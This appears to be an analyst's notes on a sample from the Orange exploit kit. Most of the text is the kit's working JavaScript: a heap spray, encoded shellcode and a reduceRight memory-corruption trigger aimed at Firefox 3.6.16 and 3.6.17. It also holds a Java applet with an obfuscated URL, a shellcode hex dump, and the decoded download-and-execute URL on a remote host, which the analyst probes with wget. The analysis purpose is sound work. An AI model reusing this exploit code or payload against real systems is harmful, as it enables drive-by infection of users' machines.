- -----------------------------
- Firefox Agent Test for the Orange EK;
- It was confirmed to drop its payload after adapting to my Firefox browser
- -----------------------------
- document.write("
- <applet archive=\"27\" code=\"KiaDA.class\" width=\"8\" height=\"18\"><param name=\"ur34\"
- value=\"103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110
- !113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!7
- 9!97!88!62!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53\"><param name=\"enm3\" value
- =\"75!115!49!109!80!101!105!45!100!119!100\"></applet>");
- document.write("<object id=\"d\"><object>");
- document.write("<embed src=\"265\" width=\"508\" height=\"367\">");
- var myobject = document.getElementById('d');
- function GetUrl(){
- return "
- 103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!
- 108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!6
- 2!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53";
- }
- ;
- function myescape(input){
- var output = '';
- ff = 255;
- f = 0;
- if (input.length % 2){
- f = 1;
- }
- for (var i = 0; i < input.length; i += 2){
- output += '%u';
- if (i == (input.length - 1)){
- output += 'ff';
- }
- else {
- output = output + input.charCodeAt(i + 1).toString(16);
- }
- output += input.charCodeAt(i).toString(16);
- }
- if (!f){
- output = output + '%uffff';
- }
- return output;
- }
- ;
- function spray(){
- var ptrs = unescape("
- %u0000%u0048%u0c00%u5864%u704e%u5349%u587a%u4157%u6844%u564a%u5143%u4359%u7674%u666c%u6a71
- %u5174%u4a69%u414e%u4166%u0000%u26f0%u104c%u5846%u426e%u0000%u240c%u3410%u007c%u0c00%u5326
- %u1005%u6379%u624a%u7959%u694f%u4663%u4445%u4261%u574b%u6666%u4d71%u7148%u4153%u4b47%u4244
- %u6f72%u5942%u655a%u784e%u4a66%u6a68%u4c67%u7879%u002e%u0c00");
- var bheader = 0x12 / 2;
- var nullt = 0x2 / 2;
- var scode = unescape("
- %u5eeb%u335f%u99c0%u6a50%ub201%u5745%uf78b%u23b2%udf8b%uda03%u46b2%uda03%ub253%u030a%u8bda
- %uaafb%u8b5b%u50fe%u5750%u45b2%ufa03%ub2aa%u0323%ub2fa%u030b%u80fa%u003f%u0175%u5747%u5050
- %ub057%u66ff%uffb9%uf2ff%u4fae%u07c6%u5f00%u8b58%ub2fe%u0346%u53fa%uc68b%u5e05%u0000%u5000
- %u5656%u466a%u02eb%u79eb%u6a57%u5930%u8b64%u8b01%u0c40%u688b%u8b1c%u085d%u6d8b%u5500%u438b
- %u8b3c%u1844%u0b78%u74c0%u8d31%u1874%uad18%uad91%uc303%uad50%u3c8d%uad03%u2c8d%u8b03%u8f74
- %u03fc%u33f3%u33c0%u99d2%u03ac%uc1d0%u05c2%u7948%u8bf7%u2474%u3b08%u7416%ue206%u58e2%ueb5d
- %u58ba%ub70f%u4d54%u03fe%u901c%u5f5d%ud3ff%uebab%u579d%u7c8b%u0824%u6650%uffb8%uf200%u4fae
- %uc033%u0788%u5f58%u04c2%ue800%uff22%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
- %uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
- %uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%u1529%u54d2%ufabd
- %u4c58%u70cc%u6b77%uf259%u23cb%u6664%u11b4%u1fb1%u1a3e%u6363%u6363%u6363%u652e%u6578%u7500
- %u6c72%u6f6d%u2e6e%u6c64%uff6c%u7468%u7074%u2f3a%u642f%u6569%u6573%u2e6c%u6874%u6865%u6369
- %u6f6b%u7972%u6f6d%u6f74%u6d72%u6c69%u2e65%u6f63%u3a6d%u3338%u3238%u6f2f%u6873%u6250%u3f59
- %u7865%u6970%u3d64%u3331%u6626%u6469%u323d%u36") + unescape(myescape(GetUrl()));
- var payload = unescape("
- %u6c6e%u706c%u454d%u7453%u4a45%u7554%u616b%u6561%u526f%u7573%u1806%u101f%u828c%u1083%u0d7b
- %u103e%u8002%u102d%u876b%u1003%u0001%u1004%u0001%u0000%u6917%u104e%u1000%u0000%uc000%u102a
- %u0040%u0000%u0005%u102e%uc001%u102a%u1806%u101f%u9090%u9090%u3401%u102b%u9090%u9090") +
- scode;
- var tr_padding = unescape("%u0c0c%u0c0c");
- while (tr_padding.length < 0x7fa00){
- tr_padding += tr_padding;
- }
- var dummy = ptrs + payload + tr_padding;
- var hspray = dummy.substring(0, 0x7fa00 - bheader - nullt);
- HeapBlocks = new Array();
- for (i = 0; i < 0x100; i ++ ){
- HeapBlocks[i] += hspray;
- }
- }
- ;
- if ((navigator.userAgent.indexOf("Firefox/3.6.16") != - 1) || (navigator.userAgent.
- indexOf("Firefox/3.6.17") != - 1)){
- spray();
- obj = new Array();
- obj.length = 2197815302;
- f = function trigger(prev, myobj, indx, array){
- alert(myobj[0]);
- }
- ;
- obj.reduceRight(f, 1, 2, 3);
- }
- -----------------------------
- Generating java applet:
- -----------------------------
- <applet archive="27" code="KiaDA.class" width="8" height="18">
- <param name="ur34" value= "103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53">
- <param name="enm3" value="75!115!49!109!80!101!105!45!100!119!100"></applet>
- ↑There goes the exploit
- -----------------------------
- Dumping the shellcode below:
- -----------------------------
- eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 8b f7 b2 23
- 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa
- 5b 8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2
- 0b 03 fa 80 3f 00 75 01 47 57 50 50 57 b0 ff 66
- b9 ff ff f2 ae 4f c6 07 00 5f 58 8b fe b2 46 03
- fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02
- eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b
- 5d 08 8b 6d 00 55 8b 43 3c 8b 44 18 78 0b c0 74
- 31 8d 74 18 18 ad 91 ad 03 c3 50 ad 8d 3c 03 ad
- 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 03
- d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2
- e2 58 5d eb ba 58 0f b7 54 4d fe 03 1c 90 5d 5f
- ff d3 ab eb 9d 57 8b 7c 24 08 50 66 b8 ff 00 f2
- ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff ff ff
- ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
- ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
- ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
- ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
- ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70
- 77 6b 59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63
- 63 63 63 63 2e 65 78 65 00 75 72 6c 6d 6f 6e 2e
- 64 6c 6c ff 68 74 74 70 3a 2f 2f 64 69 65 73 65
- 6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f 74 6f
- 72 6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f
- 73 68 50 62 59 3f 65 78 70 69 64 3d 31 33 26 66
- 69 64 3d 32
- -----------------------------
- use kernel.dll & urlmon.dll
- -----------------------------
- target:
- http://diesel.thehickorymotormile.com:8382/oshPbY?expid=13&fid=2
- -----------------------------
- Download efforts...
- -----------------------------
- --19:26:05-- http://diesel.thehickorymotormile.com:8382/oshPbY?expid=13
- => `oshPbY@expid=13'
- Resolving diesel.thehickorymotormile.com... 173.212.222.188
- Connecting to diesel.thehickorymotormile.com|173.212.222.188|:8382... connected.
- HTTP request sent, awaiting response... 502 Bad Gateway
- -----------------------------
- Looks like the url is expired :-))
- -----------------------------